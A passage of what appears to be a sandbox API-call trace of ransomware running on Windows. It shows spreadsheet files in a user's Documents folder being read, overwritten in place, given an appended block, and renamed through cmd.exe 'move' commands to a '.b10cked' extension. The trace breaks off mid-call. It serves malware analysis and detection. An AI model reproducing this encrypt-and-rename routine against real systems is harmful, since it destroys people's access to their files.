SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.251] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.251] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14b7a [0131.251] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.252] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.252] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14b7a [0131.252] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.252] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.252] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14b7a [0131.252] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.252] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.252] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14b7a [0131.252] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.252] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.252] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14b7a [0131.252] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.252] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x14692 [0131.252] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0131.253] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0131.254] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0131.254] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x14b7a [0131.254] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0131.254] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0131.254] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0131.254] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x14b7a [0131.254] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0131.254] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0131.254] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xa5bc, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xa5bc, lpOverlapped=0x0) returned 1 [0131.255] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0131.255] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xa5bc, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xa5bc, lpOverlapped=0x0) returned 1 [0131.255] SetFilePointer (in: hFile=0x114, lDistanceToMove=-42428, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xa5be [0131.255] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xa5bc, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xa5bc, lpOverlapped=0x0) returned 1 [0131.255] SetFilePointer (in: hFile=0x114, lDistanceToMove=-42428, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xa5be [0131.255] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xa5bc, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xa5bc, lpOverlapped=0x0) returned 1 [0131.259] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Muum.xlsx", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0131.259] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Muum.xlsx", cchWideChar=9, lpMultiByteStr=0x131326c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Muum.xlsx", lpUsedDefaultChar=0x0) returned 9 [0131.259] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x14b7a [0131.259] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0131.260] CloseHandle (hObject=0x114) returned 1 [0131.261] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\Muum.xlsx", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\MUUM~1.XLS") returned 0x24 [0131.261] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\") returned 0x1a [0131.261] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\MUUM~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\Muum.xlsx.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\MUUM~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\Muum.xlsx.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xa54, dwThreadId=0x9b4)) returned 1 [0131.281] CloseHandle (hObject=0x110) returned 1 [0131.281] CloseHandle (hObject=0x114) returned 1 [0131.281] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0131.281] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0131.281] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount1=27, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount2=27) returned 2 [0131.281] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0131.281] ReleaseMutex (hMutex=0xf8) returned 1 [0131.281] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0131.281] ReleaseMutex (hMutex=0xf8) returned 1 [0131.281] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0131.281] ReleaseMutex (hMutex=0xf8) returned 1 [0131.281] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0131.281] ReleaseMutex (hMutex=0xf8) returned 1 [0131.281] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\qFL-bVPAqe.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\qfl-bvpaqe.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0131.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x139e6 [0131.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.282] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=18807082601) returned 1 [0131.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x139e6 [0131.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x139e6 [0131.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0131.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x139e6 [0131.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0131.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x139e6 [0131.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x139e6 [0131.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x139e6 [0131.283] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.283] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.283] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x139e6 [0131.283] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.283] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.283] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x139e6 [0131.283] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.283] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.283] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x139e6 [0131.283] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.283] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x134fe [0131.283] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0131.284] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0131.284] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0131.284] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x139e6 [0131.284] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0131.284] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0131.284] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0131.284] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x139e6 [0131.284] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0131.284] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0131.285] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x9cf2, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x9cf2, lpOverlapped=0x0) returned 1 [0131.285] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0131.285] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x9cf2, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x9cf2, lpOverlapped=0x0) returned 1 [0131.285] SetFilePointer (in: hFile=0x114, lDistanceToMove=-40178, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x9cf4 [0131.285] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x9cf2, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x9cf2, lpOverlapped=0x0) returned 1 [0131.286] SetFilePointer (in: hFile=0x114, lDistanceToMove=-40178, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x9cf4 [0131.286] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x9cf2, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x9cf2, lpOverlapped=0x0) returned 1 [0131.290] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="qFL-bVPAqe.xlsx", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0131.290] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="qFL-bVPAqe.xlsx", cchWideChar=15, lpMultiByteStr=0x131322c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="qFL-bVPAqe.xlsx", lpUsedDefaultChar=0x0) returned 15 [0131.290] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x139e6 [0131.290] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0131.290] CloseHandle (hObject=0x114) returned 1 [0131.291] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\qFL-bVPAqe.xlsx", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\QFL-BV~1.XLS") returned 0x26 [0131.291] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\") returned 0x1a [0131.292] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\QFL-BV~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\qFL-bVPAqe.xlsx.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\QFL-BV~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\qFL-bVPAqe.xlsx.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0x990, dwThreadId=0x98c)) returned 1 [0131.296] CloseHandle (hObject=0x110) returned 1 [0131.296] CloseHandle (hObject=0x114) returned 1 [0131.296] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0131.296] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0131.296] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount1=27, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount2=27) returned 2 [0131.296] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0131.297] ReleaseMutex (hMutex=0xf8) returned 1 [0131.297] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0131.297] ReleaseMutex (hMutex=0xf8) returned 1 [0131.297] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0131.297] ReleaseMutex (hMutex=0xf8) returned 1 [0131.297] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0131.297] ReleaseMutex (hMutex=0xf8) returned 1 [0131.297] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\5d djXdWwSLPL XJ.xls" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\5oweksadhmyqwxms\\5d djxdwwslpl xj.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0131.297] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.297] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xabfa [0131.297] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.297] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=18808631460) returned 1 [0131.297] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.297] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xabfa [0131.297] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.297] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.297] SetFilePointer (in: hFile=0x114, 